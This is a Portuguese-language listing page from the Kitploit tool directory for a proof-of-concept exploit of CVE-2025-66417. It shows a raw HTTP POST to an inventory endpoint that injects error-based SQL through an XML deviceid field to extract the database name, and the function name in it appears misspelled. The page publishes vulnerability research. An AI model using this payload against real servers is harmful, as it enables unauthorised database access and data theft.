Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-66417-POC — Prova de conceito de exploit para CVE-2025-66417 demonstrando injeção de SQL via requisição POST em XML para extrair informações do banco de dados de um endpoint de inventário de aplicação web. | Kitploit
Ferramentas/GitHubGitHub/lem0naids/cve-2025-66417-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHublem0naids/cve-2025-66417-poc

CVE-2025-66417-POC

Prova de conceito de exploit para CVE-2025-66417 demonstrando injeção de SQL via requisição POST em XML para extrair informações do banco de dados de um endpoint de inventário de aplicação web.

Ver Repositório
43há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-66417

Prova de Conceito CVE-2025-66417

root@kitploit:~
POST /front/inventory.php HTTP/1.1
Host: <>
Accept-Encoding: gzip, deflate, br
Accept: text/html
Connection: keep-alive
Content-Type: text/xml
Content-Length: 429

<?xml version="1.0" encoding="UTF-8"?>
<xml>
  <QUERY>get_params</QUERY>
  <deviceid><![CDATA[' AND EXTRACTVALUE(
  1,
  CONCAT(
    0x7e,
    IFNULL(
    (SELECT DATBASE()),
      'NONE'
    ),
    0x7e
  )
)-- -]]></deviceid>
  <content></content>
</xml>
Baixar ferramenta